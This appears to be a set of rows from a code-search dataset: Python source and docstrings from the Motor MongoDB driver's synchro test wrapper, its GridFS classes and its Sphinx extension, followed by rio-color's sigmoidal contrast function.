wrapper = WrapOutgoing()
wrapper.name = attrname
setattr(new_class, attrname, wrapper)
elif isinstance(delegate_attr, property):
# Delegate the property from Synchro to Motor.
setattr(new_class, attrname, delegate_attr)
# Set DelegateProperties' and SynchroProperties' names.
for name, attr in attrs.items():
if isinstance(attr, (MotorAttributeFactory, SynchroAttr)):
if attr.name is None:
attr.name = name
return new_class
class Synchro(object):
"""
Wraps a MotorClient, MotorDatabase, MotorCollection, etc. and
makes it act like the synchronous pymongo equivalent
"""
__metaclass__ = SynchroMeta
__delegate_class__ = None
def __cmp__(self, other):
return cmp(self.delegate, other.delegate)
def synchronize(self, async_method):
"""
@param async_method: Bound method of a MotorClient, MotorDatabase, etc.
@return: A synchronous wrapper around the method
"""
@functools.wraps(async_method)
def synchronized_method(*args, **kwargs):
@functools.wraps(async_method)
def partial():
return async_method(*args, **kwargs)
return IOLoop.current().run_sync(partial)
return synchronized_method
class MongoClient(Synchro):
__delegate_class__ = motor.MotorClient
HOST = 'localhost'
PORT = 27017
_cache_credentials = SynchroProperty()
get_database = WrapOutgoing()
max_pool_size = SynchroProperty()
max_write_batch_size = SynchroProperty()
start_session = Sync()
def __init__(self, host=None, port=None, *args, **kwargs):
# So that TestClient.test_constants and test_types work.
host = host if host is not None else MongoClient.HOST
port = port if port is not None else MongoClient.PORT
self.delegate = kwargs.pop('delegate', None)
# Motor passes connect=False by default.
kwargs.setdefault('connect', True)
if not self.delegate:
self.delegate = self.__delegate_class__(host, port, *args, **kwargs)
@property
def is_locked(self):
# MotorClient doesn't support the is_locked property.
# Synchro has already synchronized current_op; use it.
result = self.admin.current_op()
return bool(result.get('fsyncLock', None))
def __enter__(self):
return self
def __exit__(self, *args):
self.delegate.close()
def __getattr__(self, name):
return Database(self, name, delegate=getattr(self.delegate, name))
def __getitem__(self, name):
return Database(self, name, delegate=self.delegate[name])
_MongoClient__all_credentials = SynchroProperty()
_MongoClient__options = SynchroProperty()
_get_topology = SynchroProperty()
_topology = SynchroProperty()
_kill_cursors_executor = SynchroProperty()
class _SynchroTransactionContext(Synchro):
def __init__(self, delegate):
self.delegate = delegate
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.synchronize(self.delegate._session.end_session)()
class ClientSession(Synchro):
__delegate_class__ = motor.motor_tornado.MotorClientSession
start_transaction = WrapOutgoing()
client = SynchroProperty()
def __init__(self, delegate):
self.delegate = delegate
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.synchronize(self.delegate.end_session)
_client = SynchroProperty()
_in_transaction = SynchroProperty()
_server_session = SynchroProperty()
_transaction_id = SynchroProperty()
_txn_read_preference = SynchroProperty()
class Database(Synchro):
__delegate_class__ = motor.MotorDatabase
get_collection = WrapOutgoing()
def __init__(self, client, name, **kwargs):
assert isinstance(client, MongoClient), (
"Expected MongoClient, got %s"
% repr(client))
self._client = client
self.delegate = kwargs.get('delegate') or motor.MotorDatabase(
client.delegate, name, **kwargs)
assert isinstance(self.delegate, motor.MotorDatabase), (
"synchro.Database delegate must be MotorDatabase, not "
" %s" % repr(self.delegate))
@property
def client(self):
return self._client
def __getattr__(self, name):
return Collection(self, name, delegate=getattr(self.delegate, name))
def __getitem__(self, name):
return Collection(self, name, delegate=self.delegate[name])
class Collection(Synchro):
__delegate_class__ = motor.MotorCollection
find = WrapOutgoing()
find_raw_batches = WrapOutgoing()
list_indexes = WrapOutgoing()
watch = WrapOutgoing()
def __init__(self, database, name, **kwargs):
if not isinstance(database, Database):
raise TypeError(
"First argument to synchro Collection must be synchro "
"Database, not %s" % repr(database))
self.database = database
self.delegate = kwargs.get('delegate') or motor.MotorCollection(
self.database.delegate, name, **kwargs)
if not isinstance(self.delegate, motor.MotorCollection):
raise TypeError(
"Expected to get synchro Collection from Database,"
" got %s" % repr(self.delegate))
def aggregate(self, *args, **kwargs):
# Motor does no I/O initially in aggregate() but PyMongo does.
func = wrap_synchro(unwrap_synchro(self.delegate.aggregate))
cursor = func(*args, **kwargs)
self.synchronize(cursor.delegate._get_more)()
return cursor
def aggregate_raw_batches(self, *args, **kwargs):
# Motor does no I/O initially in aggregate() but PyMongo does.
func = wrap_synchro(unwrap_synchro(self.delegate.aggregate_raw_batches))
cursor = func(*args, **kwargs)
self.synchronize(cursor.delegate._get_more)()
return cursor
def __getattr__(self, name):
# Access to collections with dotted names, like db.test.mike
fullname = self.name + '.' + name
return Collection(self.database, fullname,
delegate=getattr(self.delegate, name))
def __getitem__(self, name):
# Access to collections with dotted names, like db.test['mike']
fullname = self.name + '.' + name
return Collection(self.database, fullname,
delegate=self.delegate[name])
class ChangeStream(Synchro):
__delegate_class__ = motor.motor_tornado.MotorChangeStream
next = Sync('next')
close = Sync('close')
def __init__(self, motor_change_stream):
self.delegate = motor_change_stream
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class Cursor(Synchro):
__delegate_class__ = motor.motor_tornado.MotorCursor
batch_size = WrapOutgoing()
rewind = WrapOutgoing()
clone = WrapOutgoing()
close = Sync('close')
def __init__(self, motor_cursor):
self.delegate = motor_cursor
def __iter__(self):
return self
# These are special cases, they need to be accessed on the class, not just
# on instances.
@wrap_synchro
def __copy__(self):
return self.delegate.__copy__()
@wrap_synchro
def __deepcopy__(self, memo):
return self.delegate.__deepcopy__(memo)
def next(self):
cursor = self.delegate
if cursor._buffer_size():
return cursor.next_object()
elif cursor.alive:
self.synchronize(cursor._get_more)()
if cursor._buffer_size():
return cursor.next_object()
raise StopIteration
def __getitem__(self, index):
if isinstance(index, slice):
return Cursor(self.delegate[index])
else:
to_list = self.synchronize(self.delegate[index].to_list)
return to_list(length=10000)[0]
@property
@wrap_synchro
def collection(self):
return self.delegate.collection
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Don't suppress exceptions.
return False
# For PyMongo tests that access cursor internals.
_Cursor__data = SynchroProperty()
_Cursor__exhaust = SynchroProperty()
_Cursor__max_await_time_ms = SynchroProperty()
_Cursor__max_time_ms = SynchroProperty()
_Cursor__query_flags = SynchroProperty()
_Cursor__query_spec = SynchroProperty()
_Cursor__retrieved = SynchroProperty()
_Cursor__spec = SynchroProperty()
_read_preference = SynchroProperty()
class CommandCursor(Cursor):
__delegate_class__ = motor.motor_tornado.MotorCommandCursor
class GridOutCursor(Cursor):
__delegate_class__ = motor.motor_tornado.MotorGridOutCursor
def __init__(self, delegate):
if not isinstance(delegate, motor.motor_tornado.MotorGridOutCursor):
raise TypeError(
"Expected MotorGridOutCursor, got %r" % delegate)
self.delegate = delegate
def next(self):
motor_grid_out = super(GridOutCursor, self).next()
if motor_grid_out:
return GridOut(self.collection, delegate=motor_grid_out)
__next__ = next
class CursorManager(object):
# Motor doesn't support cursor managers, just avoid ImportError.
pass
class BulkOperationBuilder(object):
pass
class GridFSBucket(Synchro):
__delegate_class__ = motor.MotorGridFSBucket
def __init__(self, database, bucket_name='fs', disable_md5=False):
if not isinstance(database, Database):
raise TypeError(
"Expected Database, got %s" % repr(database))
self.delegate = motor.MotorGridFSBucket(
database.delegate, bucket_name, disable_md5)
def find(self, *args, **kwargs):
motor_method = self.delegate.find
unwrapping_method = wrap_synchro(unwrap_synchro(motor_method))
return unwrapping_method(*args, **kwargs)
class GridIn(Synchro):
__delegate_class__ = motor.MotorGridIn
def __init__(self, collection, **kwargs):
"""Can be created with collection and kwargs like a PyMongo GridIn,
or with a 'delegate' keyword arg, where delegate is a MotorGridIn.
"""
delegate = kwargs.pop('delegate', None)
if delegate:
self.delegate = delegate
else:
if not isinstance(collection, Collection):
raise TypeError(
"Expected Collection, got %s" % repr(collection))
self.delegate = motor.MotorGridIn(collection.delegate, **kwargs)
def __getattr__(self, item):
return getattr(self.delegate, item)
class SynchroGridOutProperty(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, objtype):
obj.synchronize(obj.delegate.open)()
return getattr(obj.delegate, self.name)
class GridOut(Synchro):
__delegate_class__ = motor.MotorGridOut
_id = SynchroGridOutProperty('_id')
aliases = SynchroGridOutProperty('aliases')
chunk_size = SynchroGridOutProperty('chunk_size')
close = SynchroGridOutProperty('close')
content_type = SynchroGridOutProperty('content_type')
filename = SynchroGridOutProperty('filename')
length = SynchroGridOutProperty('length')
md5 = SynchroGridOutProperty('md5')
metadata = SynchroGridOutProperty('metadata')
name = SynchroGridOutProperty('name')
upload_date = SynchroGridOutProperty('upload_date')
def __init__(
self, root_collection, file_id=None, file_document=None,
delegate=None):
"""Can be created with collection and kwargs like a PyMongo GridOut,
or with a 'delegate' keyword arg, where delegate is a MotorGridOut.
"""
if delegate:
self.delegate = delegate
else:
if not isinstance(root_collection, Collection):
raise TypeError(
"Expected Collection, got %s" % repr(root_collection))
self.delegate = motor.MotorGridOut(
root_collection.delegate, file_id, file_document)
def __getattr__(self, item):
self.synchronize(self.delegate.open)()
return getattr(self.delegate, item)
def __setattr__(self, key, value):
# PyMongo's GridOut prohibits setting these values; do the same
# to make PyMongo's assertRaises tests pass.
if key in (
"_id", "name", "content_type", "length", "chunk_size",
"upload_date", "aliases", "metadata", "md5"):
raise AttributeError()
super(GridOut, self).__setattr__(key, value)
class TimeModule(object):
"""Fake time module so time.sleep() lets other tasks run on the IOLoop.
See e.g. test_schedule_refresh() in test_replica_set_client.py.
"""
def __getattr__(self, item):
def sleep(seconds):
loop = IOLoop.current()
loop.add_timeout(time.time() + seconds, loop.stop)
loop.start()
if item == 'sleep':
return sleep
else:
return getattr(time, item)
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridOutCursor.next_object | python | def next_object(self):
grid_out = super(self.__class__, self).next_object()
if grid_out:
grid_out_class = create_class_with_framework(
AgnosticGridOut, self._framework, self.__module__)
return grid_out_class(self.collection, delegate=grid_out)
else:
# Exhausted.
return None | Get next GridOut object from cursor. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L70-L80 | null | class AgnosticGridOutCursor(AgnosticBaseCursor):
__motor_class_name__ = 'MotorGridOutCursor'
__delegate_class__ = gridfs.GridOutCursor
add_option = MotorCursorChainingMethod()
address = ReadOnlyProperty()
collation = ReadOnlyProperty()
comment = MotorCursorChainingMethod()
distinct = AsyncRead()
explain = AsyncRead()
hint = MotorCursorChainingMethod()
limit = MotorCursorChainingMethod()
max = MotorCursorChainingMethod()
max_await_time_ms = MotorCursorChainingMethod()
max_scan = MotorCursorChainingMethod()
max_time_ms = MotorCursorChainingMethod()
min = MotorCursorChainingMethod()
remove_option = MotorCursorChainingMethod()
skip = MotorCursorChainingMethod()
sort = MotorCursorChainingMethod(doc=cursor_sort_doc)
where = MotorCursorChainingMethod()
# PyMongo's GridOutCursor inherits __die from Cursor.
_Cursor__die = AsyncCommand()
def clone(self):
"""Get a clone of this cursor."""
return self.__class__(self.delegate.clone(), self.collection)
def rewind(self):
"""Rewind this cursor to its unevaluated state."""
self.delegate.rewind()
self.started = False
return self
def _empty(self):
return self.delegate._Cursor__empty
def _query_flags(self):
return self.delegate._Cursor__query_flags
def _data(self):
return self.delegate._Cursor__data
def _clear_cursor_id(self):
self.delegate._Cursor__id = 0
def _close_exhaust_cursor(self):
# Exhaust MotorGridOutCursors are prohibited.
pass
def _killed(self):
return self.delegate._Cursor__killed
@motor_coroutine
def _close(self):
yield self._framework.yieldable(self._Cursor__die())
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridOut.open | python | def open(self):
return self._framework.chain_return_value(self._ensure_file(),
self.get_io_loop(),
self) | Retrieve this file's attributes from the server.
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
:class:`~motor.MotorGridOut` now opens itself on demand, calling
``open`` explicitly is rarely needed. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L207-L221 | [
"def get_io_loop(self):\n return self.io_loop\n"
] | class AgnosticGridOut(object):
"""Class to read data out of GridFS.
MotorGridOut supports the same attributes as PyMongo's
:class:`~gridfs.grid_file.GridOut`, such as ``_id``, ``content_type``,
etc.
You don't need to instantiate this class directly - use the
methods provided by :class:`~motor.MotorGridFSBucket`. If it **is**
instantiated directly, call :meth:`open`, :meth:`read`, or
:meth:`readline` before accessing its attributes.
"""
__motor_class_name__ = 'MotorGridOut'
__delegate_class__ = gridfs.GridOut
_ensure_file = AsyncCommand()
_id = MotorGridOutProperty()
aliases = MotorGridOutProperty()
chunk_size = MotorGridOutProperty()
close = MotorGridOutProperty()
content_type = MotorGridOutProperty()
filename = MotorGridOutProperty()
length = MotorGridOutProperty()
md5 = MotorGridOutProperty()
metadata = MotorGridOutProperty()
name = MotorGridOutProperty()
read = AsyncRead()
readchunk = AsyncRead()
readline = AsyncRead()
seek = DelegateMethod()
tell = DelegateMethod()
upload_date = MotorGridOutProperty()
def __init__(
self,
root_collection,
file_id=None,
file_document=None,
delegate=None,
):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
if not isinstance(root_collection, collection_class):
raise TypeError(
"First argument to MotorGridOut must be "
"MotorCollection, not %r" % root_collection)
if delegate:
self.delegate = delegate
else:
self.delegate = self.__delegate_class__(
root_collection.delegate,
file_id,
file_document)
self.io_loop = root_collection.get_io_loop()
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
chunk = await self.readchunk()
if chunk:
return chunk
raise StopAsyncIteration()
"""), globals(), locals())
def __getattr__(self, item):
if not self.delegate._file:
raise pymongo.errors.InvalidOperation(
"You must call MotorGridOut.open() before accessing "
"the %s property" % item)
return getattr(self.delegate, item)
@coroutine_annotation
def get_io_loop(self):
return self.io_loop
@motor_coroutine
def stream_to_handler(self, request_handler):
"""Write the contents of this file to a
:class:`tornado.web.RequestHandler`. This method calls
:meth:`~tornado.web.RequestHandler.flush` on
the RequestHandler, so ensure all headers have already been set.
For a more complete example see the implementation of
:class:`~motor.web.GridFSHandler`.
.. code-block:: python
class FileHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self, filename):
db = self.settings['db']
fs = yield motor.MotorGridFSBucket(db())
try:
gridout = yield fs.open_download_stream_by_name(filename)
except gridfs.NoFile:
raise tornado.web.HTTPError(404)
self.set_header("Content-Type", gridout.content_type)
self.set_header("Content-Length", gridout.length)
yield gridout.stream_to_handler(self)
self.finish()
.. seealso:: Tornado `RequestHandler <http://tornadoweb.org/en/stable/web.html#request-handlers>`_
"""
written = 0
while written < self.length:
# Reading chunk_size at a time minimizes buffering.
f = self._framework.yieldable(self.read(self.chunk_size))
yield f
chunk = f.result()
# write() simply appends the output to a list; flush() sends it
# over the network and minimizes buffering in the handler.
request_handler.write(chunk)
request_handler.flush()
written += len(chunk)
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridOut.stream_to_handler | python | def stream_to_handler(self, request_handler):
written = 0
while written < self.length:
# Reading chunk_size at a time minimizes buffering.
f = self._framework.yieldable(self.read(self.chunk_size))
yield f
chunk = f.result()
# write() simply appends the output to a list; flush() sends it
# over the network and minimizes buffering in the handler.
request_handler.write(chunk)
request_handler.flush()
written += len(chunk) | Write the contents of this file to a
:class:`tornado.web.RequestHandler`. This method calls
:meth:`~tornado.web.RequestHandler.flush` on
the RequestHandler, so ensure all headers have already been set.
For a more complete example see the implementation of
:class:`~motor.web.GridFSHandler`.
.. code-block:: python
class FileHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self, filename):
db = self.settings['db']
fs = yield motor.MotorGridFSBucket(db())
try:
gridout = yield fs.open_download_stream_by_name(filename)
except gridfs.NoFile:
raise tornado.web.HTTPError(404)
self.set_header("Content-Type", gridout.content_type)
self.set_header("Content-Length", gridout.length)
yield gridout.stream_to_handler(self)
self.finish()
.. seealso:: Tornado `RequestHandler <http://tornadoweb.org/en/stable/web.html#request-handlers>`_ | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L227-L266 | null | class AgnosticGridOut(object):
"""Class to read data out of GridFS.
MotorGridOut supports the same attributes as PyMongo's
:class:`~gridfs.grid_file.GridOut`, such as ``_id``, ``content_type``,
etc.
You don't need to instantiate this class directly - use the
methods provided by :class:`~motor.MotorGridFSBucket`. If it **is**
instantiated directly, call :meth:`open`, :meth:`read`, or
:meth:`readline` before accessing its attributes.
"""
__motor_class_name__ = 'MotorGridOut'
__delegate_class__ = gridfs.GridOut
_ensure_file = AsyncCommand()
_id = MotorGridOutProperty()
aliases = MotorGridOutProperty()
chunk_size = MotorGridOutProperty()
close = MotorGridOutProperty()
content_type = MotorGridOutProperty()
filename = MotorGridOutProperty()
length = MotorGridOutProperty()
md5 = MotorGridOutProperty()
metadata = MotorGridOutProperty()
name = MotorGridOutProperty()
read = AsyncRead()
readchunk = AsyncRead()
readline = AsyncRead()
seek = DelegateMethod()
tell = DelegateMethod()
upload_date = MotorGridOutProperty()
def __init__(
self,
root_collection,
file_id=None,
file_document=None,
delegate=None,
):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
if not isinstance(root_collection, collection_class):
raise TypeError(
"First argument to MotorGridOut must be "
"MotorCollection, not %r" % root_collection)
if delegate:
self.delegate = delegate
else:
self.delegate = self.__delegate_class__(
root_collection.delegate,
file_id,
file_document)
self.io_loop = root_collection.get_io_loop()
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
chunk = await self.readchunk()
if chunk:
return chunk
raise StopAsyncIteration()
"""), globals(), locals())
def __getattr__(self, item):
if not self.delegate._file:
raise pymongo.errors.InvalidOperation(
"You must call MotorGridOut.open() before accessing "
"the %s property" % item)
return getattr(self.delegate, item)
@coroutine_annotation
def open(self):
"""Retrieve this file's attributes from the server.
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
:class:`~motor.MotorGridOut` now opens itself on demand, calling
``open`` explicitly is rarely needed.
"""
return self._framework.chain_return_value(self._ensure_file(),
self.get_io_loop(),
self)
def get_io_loop(self):
return self.io_loop
@motor_coroutine
|
mongodb/motor | motor/motor_gridfs.py | AgnosticGridFSBucket.find | python | def find(self, *args, **kwargs):
cursor = self.delegate.find(*args, **kwargs)
grid_out_cursor = create_class_with_framework(
AgnosticGridOutCursor, self._framework, self.__module__)
return grid_out_cursor(cursor, self.collection) | Find and return the files collection documents that match ``filter``.
Returns a cursor that iterates across files matching
arbitrary queries on the files collection. Can be combined
with other modifiers for additional control.
For example::
cursor = bucket.find({"filename": "lisa.txt"}, no_cursor_timeout=True)
while (yield cursor.fetch_next):
grid_out = cursor.next_object()
data = yield grid_out.read()
This iterates through all versions of "lisa.txt" stored in GridFS.
Note that setting no_cursor_timeout to True may be important to
prevent the cursor from timing out during long multi-file processing
work.
As another example, the call::
most_recent_three = fs.find().sort("uploadDate", -1).limit(3)
would return a cursor to the three most recently uploaded files
in GridFS.
Follows a similar interface to
:meth:`~motor.MotorCollection.find`
in :class:`~motor.MotorCollection`.
:Parameters:
- `filter`: Search query.
- `batch_size` (optional): The number of documents to return per
batch.
- `limit` (optional): The maximum number of documents to return.
- `no_cursor_timeout` (optional): The server normally times out idle
cursors after an inactivity period (10 minutes) to prevent excess
memory use. Set this option to True prevent that.
- `skip` (optional): The number of documents to skip before
returning.
- `sort` (optional): The order by which to sort results. Defaults to
None.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
If a :class:`~pymongo.client_session.ClientSession` is passed to
:meth:`find`, all returned :class:`MotorGridOut` instances
are associated with that session.
.. versionchanged:: 1.2
Added session parameter. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/motor_gridfs.py#L457-L514 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticGridFSBucket(object):
__motor_class_name__ = 'MotorGridFSBucket'
__delegate_class__ = gridfs.GridFSBucket
delete = AsyncCommand()
download_to_stream = AsyncCommand()
download_to_stream_by_name = AsyncCommand()
open_download_stream = AsyncCommand().wrap(gridfs.GridOut)
open_download_stream_by_name = AsyncCommand().wrap(gridfs.GridOut)
open_upload_stream = DelegateMethod().wrap(gridfs.GridIn)
open_upload_stream_with_id = DelegateMethod().wrap(gridfs.GridIn)
rename = AsyncCommand()
upload_from_stream = AsyncCommand()
upload_from_stream_with_id = AsyncCommand()
def __init__(self, database, collection="fs", disable_md5=False):
"""Create a handle to a GridFS bucket.
Raises :exc:`~pymongo.errors.ConfigurationError` if `write_concern`
is not acknowledged.
This class conforms to the `GridFS API Spec
<https://github.com/mongodb/specifications/blob/master/source/gridfs/gridfs-spec.rst>`_
for MongoDB drivers.
:Parameters:
- `database`: database to use.
- `bucket_name` (optional): The name of the bucket. Defaults to 'fs'.
- `chunk_size_bytes` (optional): The chunk size in bytes. Defaults
to 255KB.
- `write_concern` (optional): The
:class:`~pymongo.write_concern.WriteConcern` to use. If ``None``
(the default) db.write_concern is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) db.read_preference is used.
- `disable_md5` (optional): When True, MD5 checksums will not be
computed for uploaded files. Useful in environments where MD5
cannot be used for regulatory or other reasons. Defaults to False.
.. versionadded:: 1.0
.. mongodoc:: gridfs
"""
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError(
"First argument to %s must be MotorDatabase, not %r" % (
self.__class__, database))
self.io_loop = database.get_io_loop()
self.collection = database[collection]
self.delegate = self.__delegate_class__(
database.delegate,
collection,
disable_md5=disable_md5)
def get_io_loop(self):
return self.io_loop
def wrap(self, obj):
if obj.__class__ is grid_file.GridIn:
grid_in_class = create_class_with_framework(
AgnosticGridIn, self._framework, self.__module__)
return grid_in_class(
root_collection=self.collection,
delegate=obj)
elif obj.__class__ is grid_file.GridOut:
grid_out_class = create_class_with_framework(
AgnosticGridOut, self._framework, self.__module__)
return grid_out_class(
root_collection=self.collection,
delegate=obj)
elif obj.__class__ is gridfs.GridOutCursor:
grid_out_class = create_class_with_framework(
AgnosticGridOutCursor, self._framework, self.__module__)
return grid_out_class(
cursor=obj,
collection=self.collection)
|
mongodb/motor | doc/motor_extensions.py | get_motor_attr | python | def get_motor_attr(motor_class, name, *defargs):
attr = safe_getattr(motor_class, name)
# Store some info for process_motor_nodes()
full_name = '%s.%s.%s' % (
motor_class.__module__, motor_class.__name__, name)
full_name_legacy = 'motor.%s.%s.%s' % (
motor_class.__module__, motor_class.__name__, name)
# These sub-attributes are set in motor.asynchronize()
has_coroutine_annotation = getattr(attr, 'coroutine_annotation', False)
is_async_method = getattr(attr, 'is_async_method', False)
is_cursor_method = getattr(attr, 'is_motorcursor_chaining_method', False)
if is_async_method or is_cursor_method:
pymongo_method = getattr(
motor_class.__delegate_class__, attr.pymongo_method_name)
else:
pymongo_method = None
# attr.doc is set by statement like 'error = AsyncRead(doc="OBSOLETE")'.
is_pymongo_doc = pymongo_method and attr.__doc__ == pymongo_method.__doc__
motor_info[full_name] = motor_info[full_name_legacy] = {
'is_async_method': is_async_method or has_coroutine_annotation,
'is_pymongo_docstring': is_pymongo_doc,
'pymongo_method': pymongo_method,
}
return attr | If any Motor attributes can't be accessed, grab the equivalent PyMongo
attribute. While we're at it, store some info about each attribute
in the global motor_info dict. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/doc/motor_extensions.py#L127-L160 | null | # Copyright 2012-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Motor specific extensions to Sphinx."""
import re
from docutils.nodes import doctest_block, literal_block
from sphinx import addnodes
from sphinx.addnodes import (desc,
desc_content,
desc_signature,
seealso,
versionmodified)
from sphinx.util.inspect import safe_getattr
import motor
import motor.core
# This is a place to store info while parsing, to be used before generating.
motor_info = {}
def has_node_of_type(root, klass):
if isinstance(root, klass):
return True
for child in root.children:
if has_node_of_type(child, klass):
return True
return False
def find_by_path(root, classes):
if not classes:
return [root]
_class = classes[0]
rv = []
for child in root.children:
if isinstance(child, _class):
rv.extend(find_by_path(child, classes[1:]))
return rv
docstring_warnings = []
def maybe_warn_about_code_block(name, content_node):
if has_node_of_type(content_node, (literal_block, doctest_block)):
docstring_warnings.append(name)
def has_coro_annotation(signature_node):
try:
return 'coroutine' in signature_node[0][0]
except IndexError:
return False
def process_motor_nodes(app, doctree):
# Search doctree for Motor's methods and attributes whose docstrings were
# copied from PyMongo, and fix them up for Motor:
# 1. Add a 'coroutine' annotation to the beginning of the declaration.
# 2. Remove all version annotations like "New in version 2.0" since
# PyMongo's version numbers are meaningless in Motor's docs.
# 3. Remove "seealso" directives that reference PyMongo's docs.
#
# We do this here, rather than by registering a callback to Sphinx's
# 'autodoc-process-signature' event, because it's way easier to handle the
# parsed doctree before it's turned into HTML than it is to update the RST.
for objnode in doctree.traverse(desc):
if objnode['objtype'] in ('method', 'attribute'):
signature_node = find_by_path(objnode, [desc_signature])[0]
name = '.'.join([
signature_node['module'], signature_node['fullname']])
assert name.startswith('motor.')
obj_motor_info = motor_info.get(name)
if obj_motor_info:
desc_content_node = find_by_path(objnode, [desc_content])[0]
if (desc_content_node.line is None and
obj_motor_info['is_pymongo_docstring']):
maybe_warn_about_code_block(name, desc_content_node)
if obj_motor_info['is_async_method']:
# Might be a handwritten RST with "coroutine" already.
if not has_coro_annotation(signature_node):
coro_annotation = addnodes.desc_annotation(
'coroutine ', 'coroutine ',
classes=['coro-annotation'])
signature_node.insert(0, coro_annotation)
if obj_motor_info['is_pymongo_docstring']:
# Remove all "versionadded", "versionchanged" and
# "deprecated" directives from the docs we imported from
# PyMongo
version_nodes = find_by_path(
desc_content_node, [versionmodified])
for version_node in version_nodes:
version_node.parent.remove(version_node)
# Remove all "seealso" directives that contain :doc:
# references from PyMongo's docs
seealso_nodes = find_by_path(desc_content_node, [seealso])
for seealso_node in seealso_nodes:
if 'reftype="doc"' in str(seealso_node):
seealso_node.parent.remove(seealso_node)
pymongo_ref_pat = re.compile(r':doc:`(.*?)`', re.MULTILINE)
def _sub_pymongo_ref(match):
ref = match.group(1)
return ':doc:`%s`' % ref.lstrip('/')
def process_motor_docstring(app, what, name, obj, options, lines):
if name in motor_info and motor_info[name].get('is_pymongo_docstring'):
joined = '\n'.join(lines)
subbed = pymongo_ref_pat.sub(_sub_pymongo_ref, joined)
lines[:] = subbed.split('\n')
def build_finished(app, exception):
if not exception and docstring_warnings:
print("PyMongo docstrings with code blocks that need update:")
for name in sorted(docstring_warnings):
print(name)
def setup(app):
app.add_autodoc_attrgetter(type(motor.core.AgnosticBase), get_motor_attr)
app.connect('autodoc-process-docstring', process_motor_docstring)
app.connect('doctree-read', process_motor_nodes)
app.connect('build-finished', build_finished)
return {'parallel_write_safe': True, 'parallel_read_safe': False}
|
mapbox/rio-color | rio_color/operations.py | sigmoidal | python | def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output | r"""
Sigmoidal contrast is type of contrast control that
